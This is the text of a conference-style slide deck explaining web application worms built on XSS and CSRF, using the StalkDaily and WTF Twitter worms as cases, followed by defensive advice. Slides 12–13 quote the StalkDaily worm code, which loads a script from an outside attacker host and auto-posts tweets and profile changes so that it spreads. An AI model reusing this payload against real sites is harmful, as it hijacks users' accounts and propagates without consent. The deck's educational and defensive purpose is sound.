Web application vulnerabilities are dangerous. Hackers can target the web application directly (e.g. via SQL Injection) or can target the web application users (e.g. via XSS). In recent years a new type of attacks was developed in which an infected innocent user is infecting other users (AKA Web Application Worms). Such attacks usually has an exponential growth and a massive damage. This presentation we will discuss how to develop a web application worm and most importantly how to protect your website from web application worms.
2. Agenda
• Computer Worms
• Why Hackers Develop Web
Application Worms
• Web Application Worms
• Introduction to XSS
• StalkDaily Worm on Twitter - XSS Worm
• Introduction to CSRF
• WTF Worm on Twitter – CSRF Worm
• Potential Business Impact
• XSS & CSRF Defenses for
• Users
• Web Developers
• Security Professionals
• Questions
@mostafasiraj
3. DISCLAIMER
– Hacking websites is ILLEGAL
– This presentation is meant for educational purposes ONLY
– Only use this stuff on YOUR website and YOUR account
@mostafasiraj
4. Computer Worm
A computer worm is a
standalone malware computer
program that replicates itself in
order to spread to other
computers. Often, it uses a
computer network to spread
itself, relying on security
failures on the target computer
to access it.
(1) According to Wikipedia
@mostafasiraj
5. Why Hackers Develop Web Application Worms
• Easier to develop
• Cross platform (Windows, Linux, OSX and Android)
since execution occurs in web browser
• Don’t rely on browser, application or OS
vulnerabilities
• Can propagate faster and cleaner than even the
most notorious worms
• 1.01 billion active users on FB (2) according to yahoo finance
• 170 million active users on Twitter (3) according to techcrunch
@mostafasiraj
6. Percentage likelihood that at least one serious
vulnerability will appear in a website
(4) According to whitehat security website statistics report, Summer 2012
@mostafasiraj
7. Web Application Worms
An XSS worm is a malicious (or
sometimes non-malicious)
payload, usually written
in JavaScript, that propagate among
visitors of a website in the attempt Internet
to progressively infect other visitors.
(5) According to Wikipedia with modification
You’ll see how to create a worm using a CSRF vulnerability only without XSS
@mostafasiraj
12. StalkDaily Worm
The bio field allowed Javascript
<script src="hxxp://mikeyylolz.uuuq.com/x.js>“ />
@mostafasiraj
13. StalkDaily Script
(6) source from dcortesi.com
update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like
Twitter but with pictures, videos, and so much more! :)");
xss = urlencode('http://www.stalkdaily.com"></a><script
src="http://mikeyylolz.uuuq.com/x.js"></script><script
src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoke
n+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+autht
oken+"&user[url]="+xss+"&tab=home&update=update")
@mostafasiraj
18. WTF Worm
Updating Status on Twitter wasn’t
protected from CSFR
By visiting the hacker site, your twitter account will
automatically write two tweets
@mostafasiraj
21. XSS and CSRF on Facebook
Searches was done on Google
@mostafasiraj
22. Potential Business Impact of
Web Application Worms
• The snowball effect (Samy versus Code Red)
• Web browser botnets (DDoS)
• Think about a worm targeting
eBay or Amazon (purchases,reviews,..etc)
• Stealing users’ credentials
(MySpace worm on 2006) (10) According to computerworld.com
• What could happen if AdSense or Facebook Connect was
compromised with a web application worm
• “High Roller” malware targeting cloud based banking (estimated
losses 75M-2.5B) (11) According to redmondmag.com
@mostafasiraj
24. Defenses for Users
• Exercise caution when clicking on links sent
by email, instant message or through social
networks
• Use ScriptNo on Chrome and NoScript on
Firefox ( Use IE at your own risk )
• Avoid questionable websites and cracked
softwares
• Be alerted by security incidents
@mostafasiraj
25. Defenses for Web Developers
XSS
– Input Validation -accept only known good-
– Output Encoding (ESAPI)
– Set the session cookie to be “HTTPOnly”
– Specify the output encoding ( UTF-8, ASCII, …etc)
– Do not use "blacklist" validation
– Don’t encode/decode more than once
– (8) XSS Prevention Cheat Sheet on OWASP
CSRF
– Use CSRFGuard from OWASP
– Do not use the GET method for any request that triggers a state change.
– Identify especially dangerous operations and send a separate confirmation
request to ensure that the user intended to perform that operation.
– Ensure that there are no XSS vulnerabilities in your application
– (9) CSRF Prevention Cheat Sheet on OWASP
@mostafasiraj
26. Security Professionals
• Remember “The natural way of
writing code is insecure”
• Developers must take application security training
• Secure the whole SDLC
• Assessments and Penetration Tests
• White box and black box testing
• Start considering WAF
@mostafasiraj